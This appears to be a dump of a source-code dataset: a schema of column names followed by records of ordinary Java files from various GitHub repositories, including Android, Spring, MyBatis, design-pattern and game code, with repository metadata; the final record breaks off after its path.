blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
4
410
content_id
stringlengths
40
40
detected_licenses
listlengths
0
51
license_type
stringclasses
2 values
repo_name
stringlengths
5
132
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringlengths
4
80
visit_date
timestamp[us]
revision_date
timestamp[us]
committer_date
timestamp[us]
github_id
int64
5.85k
689M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
22 values
gha_event_created_at
timestamp[us]
gha_created_at
timestamp[us]
gha_language
stringclasses
131 values
src_encoding
stringclasses
34 values
language
stringclasses
1 value
is_vendor
bool
1 class
is_generated
bool
2 classes
length_bytes
int64
3
9.45M
extension
stringclasses
32 values
content
stringlengths
3
9.45M
authors
listlengths
1
1
author_id
stringlengths
0
313
21ee82ea87fc1e0a2862419b05d0c0b8b1c31066
14243622d2ec96a976092e626a09a06b62116bed
/src/view/ListarTriangulo.java
ff515bf337869da4c6fbba29294e8f259d028640
[]
no_license
murilopaula/ProvaJava
a08a69aac41d99ed629cc78cce80b088c3900ee7
74e80b5d136f226277fba700812f017b387c12de
refs/heads/master
2023-05-31T18:38:50.409820
2021-06-24T00:47:51
2021-06-24T00:47:51
379,739,385
0
0
null
2021-06-24T00:00:46
2021-06-23T22:03:17
Java
ISO-8859-13
Java
false
false
356
java
package view; import controllers.FormaController; import models.Forma; public class ListarTriangulo { public static void listarTriangulo() { System.out.println("\n".repeat(15)); System.out.println("__Listar triāngulos__ \n"); for (Forma formaCadastrada : FormaController.listarTriangulo()) { System.out.println(formaCadastrada); } } }
[ "murilodepaula05@gmail.com" ]
murilodepaula05@gmail.com
a2437086154a6d23b5a47f06502971ab5c759102
74d9fb3f1bd130f8e921a7931c7733ae27307281
/src/main/java/extend/E.java
efc417ade6d9b99762e7d7a52a0ca43702289f4c
[]
no_license
yuanhuacao/springioc
429f7f786de50b0ef478326137aa4f5e49274356
3d59054c2cb2540d31ff9d5f4d9697f85d0a1589
refs/heads/master
2021-01-22T13:51:35.933287
2017-09-08T08:14:30
2017-09-08T08:14:30
100,684,455
0
0
null
null
null
null
UTF-8
Java
false
false
107
java
package extend; /** * Created by Administrator on 2017/8/16. */ public interface E { void test(); }
[ "caoyuanhua@houbank.com" ]
caoyuanhua@houbank.com
92a48264aed015666ee22320c1f70ba7c96dd606
618b0ed424633a23d289eed884c9b6db136c3415
/src/main/java/com/ipgg/ipgg_os/view/vaadin/framework/DefaultAppSessionDestroyListener.java
2f4d2649c26dc4062f82431df9fea6f2ab639d50
[]
no_license
Cledersonbc/ipgg-os
0c1c5318c0c92de95ecfae3d134f7a5457de7d0f
3a5a9ad285393c82cb88ec82dd58be782fa177bf
refs/heads/master
2022-06-27T06:44:48.939320
2020-07-04T16:31:48
2020-07-04T16:31:48
118,684,454
1
1
null
2022-06-20T23:00:06
2018-01-23T23:32:53
CSS
UTF-8
Java
false
false
341
java
package com.ipgg.ipgg_os.view.vaadin.framework; import com.vaadin.server.SessionDestroyEvent; import com.vaadin.server.SessionDestroyListener; public class DefaultAppSessionDestroyListener implements SessionDestroyListener{ @Override public void sessionDestroy(SessionDestroyEvent event) { // TODO Auto-generated method stub } }
[ "wagnerdocri@gmail.com" ]
wagnerdocri@gmail.com
88ff3bc620031c60373b580c10a1dd6d5cce3733
749daad7306bfce5a411426cabaa4ba16fdeadc6
/app/src/main/java/com/example/brill/bdatingapp/gattersatter/GatterGetAllUserInfo.java
07111ad490b01881786935efe068e3532536b44a
[]
no_license
imashutoshchaudhary/DatingApp
569a25a4f46edaa6414b1371b188eb24d55093c1
7071f2568ba9b30669b9f49ab794be4cbe860977
refs/heads/master
2020-04-27T16:12:47.680268
2019-03-08T06:05:51
2019-03-08T06:05:51
174,476,509
0
1
null
null
null
null
UTF-8
Java
false
false
4,815
java
package com.example.brill.bdatingapp.gattersatter; import android.os.Parcel; import android.os.Parcelable; /** * Created by brill on 2/6/2018. */ public class GatterGetAllUserInfo implements Parcelable { private String userId, uname,gender,birthday,city,profile,photo1,photo2,photo3,photo4,photo5,photo6,photo7,photo8,photo9; public GatterGetAllUserInfo(String userId, String uname, String gender, String birthday, String city, String profile, String photo1, String photo2, String photo3, String photo4, String photo5, String photo6, String photo7, String photo8, String photo9) { this.profile = profile; this.city = city; this.birthday = birthday; this.gender = gender; this.uname = uname; this.userId = userId; this.photo1=photo1; this.photo2=photo2; this.photo3=photo3; this.photo4=photo4; this.photo5=photo5; this.photo6=photo6; this.photo7=photo7; this.photo8=photo8; this.photo9=photo9; } protected GatterGetAllUserInfo(Parcel in) { userId = in.readString(); uname = in.readString(); gender = in.readString(); birthday = in.readString(); city = in.readString(); profile = in.readString(); photo1 = in.readString(); photo2 = in.readString(); photo3 = in.readString(); photo4 = in.readString(); photo5 = in.readString(); photo6 = in.readString(); photo7 = in.readString(); photo8 = in.readString(); photo9 = in.readString(); } public static final Creator<GatterGetAllUserInfo> CREATOR = new Creator<GatterGetAllUserInfo>() { @Override public GatterGetAllUserInfo createFromParcel(Parcel in) { return new GatterGetAllUserInfo(in); } @Override public GatterGetAllUserInfo[] newArray(int size) { return new GatterGetAllUserInfo[size]; } }; public String getUserId() { return userId; } public void setUserId(String userId) { this.userId = userId; } public String getUname() { return uname; } public void setUname(String uname) { this.uname = uname; } public String getGender() { return gender; } public void setGender(String gender) { this.gender = gender; } public String getBirthday() { return birthday; } public void setBirthday(String birthday) { this.birthday = birthday; } public String getCity() { return city; } public void setCity(String city) { this.city = city; } public String getProfile() { return profile; } public void setProfile(String profile) { this.profile = profile; } public String getPhoto1() { return photo1; } public void setPhoto1(String photo1) { this.photo1 = photo1; } public String getPhoto2() { return photo2; } public void setPhoto2(String photo2) { this.photo2 = photo2; } public String getPhoto3() { return photo3; } public void setPhoto3(String photo3) { this.photo3 = photo3; } public String getPhoto4() { return photo4; } public void setPhoto4(String photo4) { this.photo4 = photo4; } public String getPhoto5() { return photo5; } public void setPhoto5(String photo5) { this.photo5 = photo5; } public String getPhoto6() { return photo6; } public void setPhoto6(String photo6) { this.photo6 = photo6; } public String getPhoto7() { return photo7; } public void setPhoto7(String photo7) { this.photo7 = photo7; } public String getPhoto8() { return photo8; } public void setPhoto8(String photo8) { this.photo8 = photo8; } public String getPhoto9() { return photo9; } public void setPhoto9(String photo9) { this.photo9 = photo9; } @Override public int describeContents() { return 0; } @Override public void writeToParcel(Parcel parcel, int i) { parcel.writeString(userId); parcel.writeString(uname); parcel.writeString(gender); parcel.writeString(birthday); parcel.writeString(city); parcel.writeString(profile); parcel.writeString(photo1); parcel.writeString(photo2); parcel.writeString(photo3); parcel.writeString(photo4); parcel.writeString(photo5); parcel.writeString(photo6); parcel.writeString(photo7); parcel.writeString(photo8); parcel.writeString(photo9); } }
[ "imashutoshchaudhary@gmail.com" ]
imashutoshchaudhary@gmail.com
f5812efb894d51a432d8640f4c60f5f6b652fa98
404a189c16767191ffb172572d36eca7db5571fb
/core/src/java/gov/georgia/dhr/dfcs/sacwis/core/lookup/codestables/Cconunit.java
ab478ce0257d85982ff3ee42f5d266fd1fd7580f
[]
no_license
tayduivn/training
648a8e9e91194156fb4ffb631749e6d4bf2d0590
95078fb2c7e21bf2bba31e2bbd5e404ac428da2f
refs/heads/master
2021-06-13T16:20:41.293097
2017-05-08T21:37:59
2017-05-08T21:37:59
null
0
0
null
null
null
null
UTF-8
Java
false
false
880
java
package gov.georgia.dhr.dfcs.sacwis.core.lookup.codestables; public interface Cconunit { public static final String CCONUNIT = "CCONUNIT"; public static final String CCONUNIT_ACN = "ACN"; public static final String CCONUNIT_APC = "APC"; public static final String CCONUNIT_BAT = "BAT"; public static final String CCONUNIT_DA2 = "DA2"; public static final String CCONUNIT_DAY = "DAY"; public static final String CCONUNIT_DEL = "DEL"; public static final String CCONUNIT_HAL = "HAL"; public static final String CCONUNIT_HOU = "HOU"; public static final String CCONUNIT_MLZ = "MLZ"; public static final String CCONUNIT_ONE = "ONE"; public static final String CCONUNIT_SES = "SES"; public static final String CCONUNIT_STU = "STU"; public static final String CCONUNIT_SUB = "SUB"; public static final String CCONUNIT_XXX = "XXX"; }
[ "lgeddam@gmail.com" ]
lgeddam@gmail.com
cb6a31085a19c710692f8ebe4aafdfb24fddd090
eb7c8e100ba821005b2108c35ff409e4af32afe6
/MyPlaces/app/src/androidTest/java/myapp/jsealey/myplaces/ExampleInstrumentedTest.java
bd3627d9c0f38006f37825cf944ff564c5a05dc5
[]
no_license
jnomada/AndroidStudioProjects
5b6f3e8c01a0e90c4900ae194663b9bc4f3c9868
e40e0fea3f7909edcdb67c93d4952a8991c3aa8f
refs/heads/main
2023-03-22T11:59:27.272152
2021-03-16T08:56:22
2021-03-16T08:56:22
316,339,878
0
0
null
null
null
null
UTF-8
Java
false
false
758
java
package myapp.jsealey.myplaces; import android.content.Context; import androidx.test.platform.app.InstrumentationRegistry; import androidx.test.ext.junit.runners.AndroidJUnit4; import org.junit.Test; import org.junit.runner.RunWith; import static org.junit.Assert.*; /** * Instrumented test, which will execute on an Android device. * * @see <a href="http://d.android.com/tools/testing">Testing documentation</a> */ @RunWith(AndroidJUnit4.class) public class ExampleInstrumentedTest { @Test public void useAppContext() { // Context of the app under test. Context appContext = InstrumentationRegistry.getInstrumentation().getTargetContext(); assertEquals("myapp.jsealey.myplaces", appContext.getPackageName()); } }
[ "jnomada@outlook.com" ]
jnomada@outlook.com
ef294c71d49282989230f95d3e545cf80d7fa6aa
4fd08e736019049a838dec9efa74cc2190b6625f
/testdata/src/main/java/virtual/FourMidB2.java
ce592b71b33f9d6a5afd22f32ac3328947fa9722
[ "BSD-3-Clause", "Apache-2.0", "LicenseRef-scancode-other-permissive" ]
permissive
knighthunter09/spring-loaded
50a42cc41912ede861cae942e6458b79f2a6faa0
658a8678a672d24e9528fb63f70fa502ca7341ea
refs/heads/master
2020-08-03T17:47:45.312949
2016-06-25T00:10:51
2016-06-25T00:10:51
73,540,025
1
0
null
2016-11-12T08:04:24
2016-11-12T08:04:21
null
UTF-8
Java
false
false
64
java
package virtual; public class FourMidB2 extends FourTopB2 { }
[ "andrew.clement@gmail.com" ]
andrew.clement@gmail.com
8d520cc761bf6f23610fdba7a8cc0bd2e98ee2ae
c4b5c128b3f5db5b9a240339972fc5543938c3a7
/DBZY_FPP/src/.svn/pristine/8d/8d520cc761bf6f23610fdba7a8cc0bd2e98ee2ae.svn-base
780d47e4be00109b25d7b91abd021c49cd26e6cf
[]
no_license
wuzhanqiang/SSM-
6659e45bf4bdab4bff53716e428734be21e3de93
cbb3df80115366f85931d623c1b69ff803368935
refs/heads/master
2020-05-23T20:52:29.297212
2019-05-16T03:35:38
2019-05-16T03:35:38
186,940,196
0
0
null
null
null
null
UTF-8
Java
false
false
3,527
package com.nepharm.apps.fpp.biz.bd.event; import java.sql.Connection; import java.sql.SQLException; import java.util.List; import com.actionsoft.bpms.bo.engine.BO; import com.actionsoft.bpms.bpmn.engine.core.delegate.ProcessExecutionContext; import com.actionsoft.bpms.bpmn.engine.listener.InterruptListener; import com.actionsoft.bpms.bpmn.engine.model.run.delegate.ProcessInstance; import com.actionsoft.bpms.server.UserContext; import com.actionsoft.bpms.util.DBSql; import com.actionsoft.sdk.local.SDK; import com.actionsoft.sdk.local.api.BOAPI; import com.actionsoft.sdk.local.api.ProcessAPI; import com.nepharm.apps.fpp.biz.bd.constant.BDConstant; import com.nepharm.apps.fpp.biz.gm.constant.GMConstant; public class SjdrJL extends InterruptListener { public SjdrJL() { setDescription("计量器具数据导入"); } @Override public boolean execute(ProcessExecutionContext ctx) throws Exception { UserContext userContext = ctx.getUserContext(); ProcessInstance proInst = ctx.getProcessInstance(); String proInstId = proInst.getId(); BOAPI boapi = SDK.getBOAPI(); ProcessAPI proapi = SDK.getProcessAPI(); return jlqjda(boapi, proapi, proInstId, userContext); } private boolean jlqjda(BOAPI boapi, ProcessAPI proapi, String proInstId, UserContext userContext) throws SQLException { List<BO> formList = boapi.query(BDConstant.TAB_BD_SJDR_M).addQuery("BINDID = ", proInstId).list(); if(formList != null && !formList.isEmpty()) { BO formData = formList.get(0); String BMBH = formData.getString("BMBH");//部门ID String BM = formData.getString("BM");//部门名称 String MS = formData.getString("MS");//导入模式 0为覆盖导入,1为增量导入 List<BO> list = boapi.query(BDConstant.TAB_BD_SJDR_JL).addQuery("BINDID = ", proInstId).list(); if(list != null && !list.isEmpty()) { if("0".equals(MS)) { Connection conn = DBSql.open(); try { // DBSql.update("delete from "+GMConstant.TAB_GM_JLQJDA+" where BMBH = '"+BMBH+"'"); List<BO> oList = boapi.query(GMConstant.TAB_GM_JLQJDA).addQuery("BMBH = ", BMBH).list(); if(oList != null && !oList.isEmpty()) { for(BO obo : oList) { String bindId = obo.getBindId(); boapi.removeByBindId(GMConstant.TAB_GM_JLQJDA, bindId, conn); } } }catch(Exception e) { }finally { conn.close(); } } for(BO data : list) { BO bo = new BO(); bo.set("WPBH", data.get("WPBH")); bo.set("NKBH", data.get("NKBH")); bo.set("WPMC", data.get("WPMC")); bo.set("WPLX", data.get("WPLX")); bo.set("JLDW", data.get("JLDW")); bo.set("GGXH", data.get("GGXH")); bo.set("CLFW", data.get("CLFW")); bo.set("ZQD", data.get("ZQD")); bo.set("GYSMC", data.get("GYSMC")); bo.set("ZZSMC", data.get("ZZSMC")); bo.set("CCBH", data.get("CCBH")); bo.set("AZDD", data.get("AZDD")); bo.set("JHSYRQ", data.get("JHSYRQ")); bo.set("ZT", data.get("ZT")); bo.set("BMBH", BMBH); bo.set("BM", BM); bo.set("ZSBH", data.get("ZSBH")); bo.set("BZ", data.get("BZ")); bo.set("QRJG", data.get("QRJG")); bo.set("JDDW", data.get("JDDW")); ProcessInstance p = proapi.createBOProcessInstance(GMConstant.DEF_GM_JLQJDA, "admin", "计量器具档案"); boapi.create(GMConstant.TAB_GM_JLQJDA, bo, p, userContext); } } return true; }else { return false; } } }
[ "904898369@qq.com" ]
904898369@qq.com
24721fac1c8fb2ce7104c6bf1e2bddb734306f3a
88c535b38d2991651f95b5caeb2b380c0cbb3cb7
/src/main/java/life/littleliu/community/CommunityApplication.java
f37d7b7d1dc49a78d8d26f2fa562de617b5147b7
[]
no_license
icheckmateu/community
e23d131379ba6a5be1c19c56045dd7b68f1cf2ca
9e20a04fe6ce38752badda0f6706a699404a84ab
refs/heads/master
2023-04-05T15:18:35.435502
2021-04-14T08:49:20
2021-04-14T08:49:20
352,822,878
0
0
null
null
null
null
UTF-8
Java
false
false
431
java
package life.littleliu.community; import org.mybatis.spring.annotation.MapperScan; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; @SpringBootApplication @MapperScan("life.littleliu.community.mapper") public class CommunityApplication { public static void main(String[] args) { SpringApplication.run(CommunityApplication.class, args); } }
[ "522448949@qq.com" ]
522448949@qq.com
eaef84ec83c8c3219b71788c678d9bad2c5aab72
f1f0a36275eec354505317f3dea0d50752a9d2a6
/src/hometheater/Amplifier.java
69b4ca27eaac886a181f7af1b272944b39a7d72b
[]
no_license
somadesignpattern/Adapter
cb3f4edefcac4cff98e97ce55eae24da2ae4219c
7d3f7e487b365e230c5796bf5cd8bdab0f08b0e1
refs/heads/master
2021-01-23T22:43:28.306783
2014-08-13T05:34:21
2014-08-13T05:34:21
null
0
0
null
null
null
null
UTF-8
Java
false
false
1,089
java
package hometheater; public class Amplifier { String description; Tuner tuner; DvdPlayer dvd; CdPlayer cd; public Amplifier(String description) { this.description = description; } public void on() { System.out.println(description + " on"); } public void off() { System.out.println(description + " off"); } public void setStereoSound() { System.out.println(description + " stereo mode on"); } public void setSurroundSound() { System.out.println(description + " surround sound on (5 speakers, 1 subwoofer)"); } public void setVolume(int level) { System.out.println(description + " setting volume to " + level); } public void setTuner(Tuner tuner) { System.out.println(description + " setting tuner to " + dvd); this.tuner = tuner; } public void setDvd(DvdPlayer dvd) { System.out.println(description + " setting DVD player to " + dvd); this.dvd = dvd; } public void setCd(CdPlayer cd) { System.out.println(description + " setting CD player to " + cd); this.cd = cd; } public String toString() { return description; } }
[ "camera702@naver.com" ]
camera702@naver.com
2be03cb4f73e120a82738564d07419327b39ffa4
f89d2f3df9fc9da5cc4e99fed11b6d4b45d4df91
/src/com/design/structure/composite/Employee.java
635b2d11f732e68395fec595260ebda52ce4638c
[]
no_license
terrymy/design-pattern
558cc3ab268a6dff52259e0b8b8e4e16745eeb07
d9c7c68cff611105e315eaa544fa1ab01e77e671
refs/heads/master
2021-09-13T06:06:11.901759
2021-08-06T14:34:58
2021-08-06T14:34:58
186,538,447
0
0
null
null
null
null
UTF-8
Java
false
false
835
java
package com.design.structure.composite; import java.util.ArrayList; import java.util.List; public class Employee { private String name; private String dept; private int salary; private List<Employee> subordinates; //构造函数 public Employee(String name,String dept, int sal) { this.name = name; this.dept = dept; this.salary = sal; subordinates = new ArrayList<Employee>(); } public void add(Employee e) { subordinates.add(e); } public void remove(Employee e) { subordinates.remove(e); } public List<Employee> getSubordinates(){ return subordinates; } public String toString(){ return ("Employee :[ Name : "+ name +", dept : "+ dept + ", salary :" + salary+" ]"); } }
[ "my.tang@fjsdn.com" ]
my.tang@fjsdn.com
bea3118389325b597bed1e1ce73bfb7086d0a29b
e2de0fc5d331d0cab2ca69c59dac9749ecda4fe7
/src/myGame/View/Turtle.java
1e83e738040d224e7115b50aee60242bafe101f2
[]
no_license
lucatombesi99/FrogArcade
e5116061ed00ceebd6ef8e1ca29ba4896a2413ee
3eb7d74770fa0cdfaa1b03dd6e7637e65a23f694
refs/heads/master
2022-12-14T21:22:16.634093
2020-09-09T16:48:52
2020-09-09T16:48:52
283,444,488
0
0
null
null
null
null
UTF-8
Java
false
false
2,103
java
package myGame.View; import javafx.scene.image.Image; import java.io.File; public class Turtle extends Entity { private final double speed; Image turtle1; Image turtle2; Image turtle3; Image turtleWet1; Image turtleWet2; Image turtleWet3; public Turtle(int xPos, int yPos, double speed) { turtle1 = new Image(new File(MenuScene.IMAGE_PATH+ "TurtleAnimation1.png").toURI().toString(), 70, 30, true, true); turtle2 = new Image(new File(MenuScene.IMAGE_PATH + "TurtleAnimation2.png").toURI().toString(), 70, 30,true, true); turtle3 = new Image(new File(MenuScene.IMAGE_PATH+ "TurtleAnimation3.png").toURI().toString(), 70, 30,true, true); turtleWet1 = new Image(new File(MenuScene.IMAGE_PATH + "TurtleAnimation2Wet.png").toURI().toString(), 70, 30,true, true); turtleWet2 = new Image(new File(MenuScene.IMAGE_PATH + "TurtleAnimation3Wet.png").toURI().toString(), 70, 30,true, true); turtleWet3 = new Image(new File(MenuScene.IMAGE_PATH + "TurtleAnimation4Wet.png").toURI().toString(),70, 30,true, true); setX(xPos); setY(yPos); this.speed = speed; setImage(turtle2); } public double getSpeed(){ return this.speed; } @Override public void movement (Long now){ move(speed, 0); if (getX() > 500 && speed > 0) setX(-180); if (getX() < -50 && speed < 0) setX(700); if ((now/3/ 900000000 +((int)this.getY()/100) )% 4 == 1) { setImage(turtleWet1); } else if ((now/3/900000000+((int)this.getY()/100))% 4 == 2) { setImage(turtleWet2); } else if ((now/3/ 900000000 +((int)this.getY()/100) )% 4== 3) { setImage(turtleWet3); } else if ((now/3/ 900000000 +((int)this.getY()/100) ) % 4== 0) { setImage(turtle2); } else if ((now/3/ 900000000 +((int)this.getY()/100) ) % 3== 1) { setImage(turtle1); } else if ((now/3/ 900000000 +((int)this.getY()/100) )% 3== 2) { setImage(turtle3); } } }
[ "lucatombesi99@gmail.com" ]
lucatombesi99@gmail.com
cc58b5a42e412821d2d49c87cb6b6d6f93e773dd
9f30fbae8035c2fc1cb681855db1bc32964ffbd4
/Java/luboliang/task1/test_SpringMyBatis/src/test/java/com/jnshu/UserTest.java
6b76b9c92392c91e19b43190f567b4c1db3d64c9
[]
no_license
IT-xzy/Task
f2d309cbea962bec628df7be967ac335fd358b15
4f72d55b8c9247064b7c15db172fd68415492c48
refs/heads/master
2022-12-23T04:53:59.410971
2019-06-20T21:14:15
2019-06-20T21:14:15
126,955,174
18
395
null
2022-12-16T12:17:21
2018-03-27T08:34:32
null
UTF-8
Java
false
false
2,195
java
package com.jnshu; import mybatis.Mapper; import mybatis.User; import org.junit.Test; import org.junit.runner.RunWith; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.test.context.ContextConfiguration; import org.springframework.test.context.junit4.SpringJUnit4ClassRunner; @RunWith(SpringJUnit4ClassRunner.class) @ContextConfiguration("classpath:applicationContext.xml") public class UserTest { @Autowired private Mapper userMapper; @Test public void addUserTest() { User user = new User(); user.setName("雷锋"); user.setCreate_at(System.currentTimeMillis()); user.setUpdate_at(System.currentTimeMillis()); user.setQq(12345678); user.setCourse_type("web"); user.setEntrance_time(18273123); user.setGraduate_school("北京师范大学"); user.setWish(678678); user.setDaily_link("www.jnshu.com/school/28015/daily."); user.setSet_to("变胖两斤"); user.setBrother("鲁伯良"); user.setLearn("朋友推荐"); // 直接执行方法传参 userMapper.addUser(user); System.out.println("用户Id===" + user.getId()); } @Test public void deleteTest(){ System.out.println(userMapper.deleteUser(7)); } @Test public void updateUserTest(){ User user=new User(); user.setName("雷锋"); user.setUpdate_at(System.currentTimeMillis()); user.setQq(12345678); user.setCourse_type("web"); user.setEntrance_time(18273123); user.setGraduate_school("北京师范大学"); user.setWish(678678); user.setDaily_link("www.jnshu.com/school/28015/daily."); user.setSet_to("变胖两斤"); user.setBrother("鲁伯良"); user.setLearn("朋友推荐"); user.setId(34); System.out.println(userMapper.updateUser(user)); } @Test public void findUserById(){ System.out.println(userMapper.findUser(34)); } @Test public void findAll(){ System.out.println(userMapper.findAll()); } }
[ "noreply@github.com" ]
IT-xzy.noreply@github.com
3d381fcf3205a907b93d81c28093675628010ff8
e6c5205c9e4d0d81095f7a764a7a2df002d60830
/src/org/apache/ctakes/typesystem/type/textsem/MedicationRouteModifier_Type.java
efc10db9f49447d7a97fc0e8eada427dfff2857a
[ "Apache-2.0" ]
permissive
harryhoch/DeepPhe
796009a6f583bd7f0032d26300cad8692b0d7a6d
fe8c2d2c79ec53bb048235816535901bee961090
refs/heads/master
2020-12-26T03:22:44.606278
2015-05-22T15:21:45
2015-05-22T15:21:45
50,454,055
0
0
null
2016-01-26T19:39:54
2016-01-26T19:39:54
null
UTF-8
Java
false
false
2,203
java
/* First created by JCasGen Mon May 11 11:00:52 EDT 2015 */ package org.apache.ctakes.typesystem.type.textsem; import org.apache.uima.jcas.JCas; import org.apache.uima.jcas.JCasRegistry; import org.apache.uima.cas.impl.CASImpl; import org.apache.uima.cas.impl.FSGenerator; import org.apache.uima.cas.FeatureStructure; import org.apache.uima.cas.impl.TypeImpl; import org.apache.uima.cas.Type; /** Means by which the medication was taken or administered. Value set includes Topical, Enteral_Oral, Parenteral_Intravenous, Other, undetermined, etc. * Updated by JCasGen Mon May 11 11:00:52 EDT 2015 * @generated */ public class MedicationRouteModifier_Type extends Modifier_Type { /** @generated * @return the generator for this type */ @Override protected FSGenerator getFSGenerator() {return fsGenerator;} /** @generated */ private final FSGenerator fsGenerator = new FSGenerator() { public FeatureStructure createFS(int addr, CASImpl cas) { if (MedicationRouteModifier_Type.this.useExistingInstance) { // Return eq fs instance if already created FeatureStructure fs = MedicationRouteModifier_Type.this.jcas.getJfsFromCaddr(addr); if (null == fs) { fs = new MedicationRouteModifier(addr, MedicationRouteModifier_Type.this); MedicationRouteModifier_Type.this.jcas.putJfsFromCaddr(addr, fs); return fs; } return fs; } else return new MedicationRouteModifier(addr, MedicationRouteModifier_Type.this); } }; /** @generated */ @SuppressWarnings ("hiding") public final static int typeIndexID = MedicationRouteModifier.typeIndexID; /** @generated @modifiable */ @SuppressWarnings ("hiding") public final static boolean featOkTst = JCasRegistry.getFeatOkTst("org.apache.ctakes.typesystem.type.textsem.MedicationRouteModifier"); /** initialize variables to correspond with Cas Type and Features * @generated * @param jcas JCas * @param casType Type */ public MedicationRouteModifier_Type(JCas jcas, Type casType) { super(jcas, casType); casImpl.getFSClassRegistry().addGeneratorForType((TypeImpl)this.casType, getFSGenerator()); } }
[ "tseytlin@pitt.edu" ]
tseytlin@pitt.edu
87b322cdbb98484cdf3ea6b010067ddc808184b7
f922a890dd8082e1edbe7e75ee33b8d104fb2dfa
/src/main/java/xin/lz1998/wcads/service/impl/WcaResultServiceImpl.java
521e2a7c86ff921089f381a18e0f5854bb9baf32
[]
no_license
lz1998/WCA-Data-Service
ce4dc56933f369f88f2e4a7029bb74f3211ba65d
1f8440b92665c602405af29684aa00d74d907cdf
refs/heads/master
2022-08-26T02:46:25.192780
2020-04-14T15:44:37
2020-04-14T15:44:37
212,606,312
3
1
null
2022-06-30T14:46:41
2019-10-03T14:53:39
Java
UTF-8
Java
false
false
3,088
java
package xin.lz1998.wcads.service.impl; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.data.domain.Page; import org.springframework.data.domain.Pageable; import org.springframework.stereotype.Service; import xin.lz1998.wcads.entity.WcaCompetition; import xin.lz1998.wcads.entity.WcaResult; import xin.lz1998.wcads.repository.WcaCompetitionRepository; import xin.lz1998.wcads.repository.WcaResultRepository; import xin.lz1998.wcads.service.WcaResultService; import java.util.*; import java.util.function.Consumer; import java.util.stream.Collectors; @Service public class WcaResultServiceImpl implements WcaResultService { @Autowired WcaResultRepository wcaResultRepository; @Autowired WcaCompetitionRepository wcaCompetitionRepository; private static List<String> roundTypeOrder=new ArrayList<>(); static { roundTypeOrder.add("h"); roundTypeOrder.add("0"); roundTypeOrder.add("d"); roundTypeOrder.add("1"); roundTypeOrder.add("b"); roundTypeOrder.add("2"); roundTypeOrder.add("e"); roundTypeOrder.add("g"); roundTypeOrder.add("3"); roundTypeOrder.add("c"); roundTypeOrder.add("f"); } public Page findResultsByPersonIdAndEventId(String personId, String eventId, Pageable pageable) { return wcaResultRepository.findWcaResultsByPersonIdAndEventId(personId, eventId, pageable); } @Override public Page findResultsByPersonId(String personId, Pageable pageable) { return wcaResultRepository.findWcaResultsByPersonId(personId,pageable); } @Override public Object findResultsByPersonIdAndEventIdOrderByDateAndRound(String personId, String eventId) { List<WcaResult> wcaResultList = wcaResultRepository.findWcaResultsByPersonIdAndEventId(personId, eventId); List<String> competitionIdList=wcaResultList.stream().map(WcaResult::getCompetitionId).collect(Collectors.toList()); List<WcaCompetition> wcaCompetitionList = wcaCompetitionRepository.findWcaCompetitionsByIdIn(competitionIdList); Map<String,WcaCompetition> wcaCompetitionMap=new HashMap<>(); wcaCompetitionList.forEach(wcaCompetition -> wcaCompetitionMap.put(wcaCompetition.getId(),wcaCompetition)); wcaResultList.sort((o1, o2) -> { WcaCompetition competition1 = wcaCompetitionMap.get(o1.getCompetitionId()); WcaCompetition competition2 = wcaCompetitionMap.get(o2.getCompetitionId()); // YEAR防止溢出,-1900 // MONTH不做处理 // DAY范围20~620,给roundType留11个位置 // roundType范围0-10 Integer v1=(competition1.getYear()-1900)*10000000+competition1.getMonth()*1000+competition1.getDay()*20+roundTypeOrder.indexOf(o1.getRoundTypeId()); Integer v2=(competition2.getYear()-1900)*10000000+competition2.getMonth()*1000+competition2.getDay()*20+roundTypeOrder.indexOf(o2.getRoundTypeId()); return (v1-v2); }); return wcaResultList; } }
[ "875543533@qq.com" ]
875543533@qq.com
5602b54bf2c5adebf5f139b0f94e6f25c0e050b0
d11c67818df0312bf97e17c47a70961703c5ba72
/src/main/java/entities/Cycle.java
0f6cacc160ae74b3187a5252a4f6bdd1caee9d09
[]
no_license
vbutzke/PetriNetworkSimulator
ee523421cf2f4d9c25481f3e7cc72aeeb0cc68eb
917f7bf271878d887a145e2f7232219f6b6936ef
refs/heads/master
2020-04-29T09:38:27.456714
2019-04-22T07:18:15
2019-04-22T07:18:15
176,032,191
0
0
null
null
null
null
UTF-8
Java
false
false
2,596
java
package entities; import java.util.Hashtable; import java.util.LinkedList; @SuppressWarnings("StringConcatenationInLoop") public class Cycle { private int step; private Hashtable<String, Integer> places = new Hashtable<>(); private final LinkedList<Arc> arcs = new LinkedList<>(); private final LinkedList<Transition> transitions = new LinkedList<>(); private String output = ""; public Cycle(String placesLine, String transitionsLine, String arcsLine) { step = 0; fillPlaces(placesLine); fillArcs(arcsLine); fillTransitions(transitionsLine); } private void fillPlaces(String line){ String [] tokens = line.split(","); for (String token : tokens) { String[] placeMarkPair = token.split(" "); places.put(placeMarkPair[0], Integer.parseInt(placeMarkPair[1])); } } private void fillArcs(String line){ String [] tokens = line.split(","); for (String token : tokens) { //AN L1 T1 / AN T1 L1} String[]alt = token.split(" "); Arc arc = new Arc(alt[1], alt[2], Integer.parseInt(alt[3])); arcs.add(arc); } } private void fillTransitions(String line){ String [] tokens = line.split(","); for (String token : tokens) { LinkedList<Arc> inArcs = new LinkedList<>(); LinkedList<Arc> outArcs = new LinkedList<>(); for (Arc arc : arcs) { if(arc.getOrigin().equalsIgnoreCase(token)){ outArcs.add(arc); } else if(arc.getDestination().equalsIgnoreCase(token)) { inArcs.add(arc); } } transitions.add(new Transition(token, inArcs, outArcs, places)); } } public Hashtable<String, Integer> getPlaces() { return places; } public LinkedList<Arc> getArcs() { return arcs; } public LinkedList<Transition> getTransitions() { return transitions; } public void nextStep(){ step++; } private void buildOutput(){ output = " | " + step + " | "; for (String key : places.keySet()) { output = output + places.get(key) + " | "; } for (Transition transition : transitions) { output = output + transition.isEnabled() + " | "; } } public String getOutput(){ buildOutput(); return output; } public void setPlaces(Hashtable<String, Integer> places) { this.places = places; } }
[ "vivipiccobr@gmail.com" ]
vivipiccobr@gmail.com
7bd03e527b2212759d4567e11e10e7adddc31faf
0af8b92686a58eb0b64e319b22411432aca7a8f3
/large-multiproject/project72/src/main/java/org/gradle/test/performance72_4/Production72_396.java
